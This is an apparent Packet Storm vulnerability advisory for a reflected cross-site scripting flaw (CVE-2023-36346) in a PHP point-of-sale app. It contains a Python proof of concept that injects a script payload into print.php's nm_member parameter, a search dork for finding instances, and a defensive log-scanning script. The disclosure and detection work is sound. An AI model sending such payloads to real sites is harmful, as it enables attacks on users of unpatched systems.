Source: Packet Storm (PACKETSTORM:173280)
Author: Amirhossein Bahramizadeh
Published: Jul 03, 2023

Sales Of Cashier Goods 1.0 Cross Site Scripting


EPSS: 0.001 (Low), percentile 43.7%

```python
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# Country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Build the request parameters. requests percent-encodes query values itself,
# so the payload is passed unencoded; quoting it first would double-encode it.
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
```
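A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access logs for `print.php` requests whose `nm_member` value decodes to HTML markup, including double-encoded values. The log lines are constructed samples, and the function names and the markup pattern are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jul/2023:10:00:01 +0000] "GET /print.php?nm_member=Budi HTTP/1.1" 200 512',
    '203.0.113.9 - - [03/Jul/2023:10:00:07 +0000] "GET /print.php?nm_member=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1" 200 540',
    '203.0.113.9 - - [03/Jul/2023:10:00:09 +0000] "GET /pos/print.php?nm_member=%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E HTTP/1.1" 200 560',
    '198.51.100.2 - - [03/Jul/2023:10:01:00 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 900',
    '198.51.100.7 - - [03/Jul/2023:10:02:00 +0000] "GET /print.php?nm_member=Siti%20Aminah HTTP/1.1" 200 520',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed heuristic: angle brackets, inline event handlers, javascript: URLs.
MARKUP_RE = re.compile(r"[<>]|\bon[a-z]+\s*=|javascript:", re.I)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines, path="/print.php", param="nm_member"):
    """Return log lines where `param` on `path` decodes to HTML markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith(path):
            continue
        # parse_qs decodes one layer; fully_decode removes any further layers.
        values = parse_qs(target.query, keep_blank_values=True).get(param, [])
        if any(MARKUP_RE.search(fully_decode(v)) for v in values):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A match shows an attempt, not a successful injection; whether the script executes depends on whether the application HTML-encodes the value on output.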
